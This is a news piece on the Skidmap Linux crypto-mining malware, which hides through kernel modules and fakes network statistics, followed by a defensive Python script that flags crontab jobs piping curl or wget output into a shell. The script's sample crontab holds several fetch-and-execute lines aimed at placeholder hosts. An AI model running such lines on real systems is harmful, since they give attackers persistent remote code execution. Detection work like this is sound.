According to a Trend Micro report, the crypto-mining malware Skidmap has hit Linux users. This new malware uses loadable kernel modules to sneak into Linux systems and keep its crypto-mining activity under the radar. According to the research, this malware exhibits the increasing complexity of recent cryptocurrency mining threats.
The malware hides its malicious activity by displaying fake network traffic stats. The attacker can use the malware to gain unfettered access to the affected system. Skidmap can also set up a secret master password that gives it access to any user account in the system.
Threat analysts Augusto Remillano II and Jakub Urbanec explained that Skidmap goes to great lengths to disguise itself. It uses an IP route module to hide key files and the Netlink rootkit to fake network and CPU statistics. The infection comes via the crontab process, and a script is used to download the Trojan.Linux.SKIDMAP.UWEJX malware.
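Because the infection arrives through crontab and a downloader script, auditing cron jobs for download-and-execute entries is a practical check. The following is an added example, not code from the Trend Micro report: the sample crontab is constructed, and the "fetch piped into a shell" pattern is an assumption about what such an entry looks like, since the article does not show the actual one.

```python
import re

# Constructed sample crontab content (not taken from the Skidmap report).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://downloads.example.invalid/pm.sh | sh
@reboot wget -q -O - http://198.51.100.7/init | bash
MAILTO=root
15 2 * * 0 /usr/bin/curl -o /var/backups/list.txt https://mirror.example.invalid/list.txt
*/10 * * * * (curl -s http://example.invalid/a || wget -qO- http://example.invalid/a) | bash -s
"""

# A download tool invoked as a command (bare name or full path).
FETCH = re.compile(r"(?:^|[\s;&|(/])(curl|wget)\s")
# Output piped into a shell interpreter: sh, bash, dash, zsh, ksh.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/\S*/)?(?:ba|da|z|k)?sh\b")
# Environment assignments such as MAILTO=root are not jobs.
ENV_ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


def cron_command(line):
    """Return the command part of a user-crontab line, or None for non-job lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_ASSIGN.match(line):
        return None
    # "@reboot cmd" has one schedule field; standard entries have five.
    schedule_fields = 1 if line.startswith("@") else 5
    fields = line.split(None, schedule_fields)
    return fields[-1] if len(fields) == schedule_fields + 1 else None


def suspicious_entries(text):
    """Return (line_number, command) for jobs that fetch content and pipe it to a shell."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = cron_command(line)
        if cmd and FETCH.search(cmd) and PIPE_TO_SHELL.search(cmd):
            hits.append((n, cmd))
    return hits


if __name__ == "__main__":
    for n, cmd in suspicious_entries(SAMPLE_CRONTAB):
        print(f"line {n}: {cmd}")
```

Run it against the output of `crontab -l` for each user and against the files under `/etc/cron.d`; entries in system crontabs carry an extra user field, which ends up inside the returned command and does not affect the match.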
Trend Micro advised Linux users to adopt best practices to avoid this malware. It is also recommended to keep systems and servers updated and patched. Let us know in the comments what you think of this sophisticated malware.